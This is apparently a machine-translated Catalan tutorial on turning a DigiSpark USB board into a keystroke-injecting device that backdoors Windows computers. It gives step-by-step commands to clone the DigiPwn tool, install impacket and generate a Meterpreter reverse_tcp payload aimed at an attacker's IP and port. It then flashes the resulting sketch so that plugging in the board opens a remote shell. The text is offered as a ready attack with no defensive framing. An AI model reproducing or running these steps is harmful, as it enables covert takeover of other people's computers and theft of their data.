Taula de continguts:
2025 Autora: John Day | [email protected]. Última modificació: 2025-01-13 06:57
Què fem, doncs, aquí?
DigiSpark és una petita eina de desenvolupament basada en Arduino que pot actuar com una entrada de teclat HID. Avui manipulem aquest dispositiu per fer una porta posterior d’un sistema operatiu Windows.
Subministraments
IDE Arduino
Una màquina Windows
DigiSpark
Marc de Metasploit
Python 2.7 (Nota: necessiteu Python "2.7" no opteu per cap altra versió)
impacket
Cervell! Això ajuda
Pas 1: cloneu el dipòsit DigiPwn
Clona al repositori GitHub de DigiPwn per
git clone
Ara canvieu el directori a DigiPwn per
cd DigiPwn /
Pas 2: Instal·leu Impacket [mòduls requerits per Python]
Aquest mòdul és necessari per executar el servidor SMB que és necessari per a la biblioteca de càrrega útil
sudo apt-get install python-impacket
O bé podeu descarregar la biblioteca d’impacket i instal·lar-la des d’aquí.
Pas 3: generem la càrrega útil
Correr
python DigiPwn.py [HOST] [PORT] [PAYLOAD] [OUTPUT FILE] [format]
ex
python DigiPwn.py 192.168.1.2 8080 windows / meterpreter / reverse_tcp win.vbs win.vbs
Ara se us demanarà si heu d'iniciar el servidor de configuració i de SMB. Premeu y i premeu Intro
Pas 4: ara pengeu el codi a Arduino
Abans de carregar-lo, hem d'assegurar-nos que la placa DigiSpark està instal·lada a Arduino per fer-ho aquí.
després d'això, pengeu el fitxer keystroke_inject.ino generat per l'script. Un cop fet ja ho podeu fer
Pas 5: és hora d’endollar el nadó
Connecteu el vostre DigiSpark ara i espereu 10 segons
BOOM Hi ha una sessió de metropreter oberta!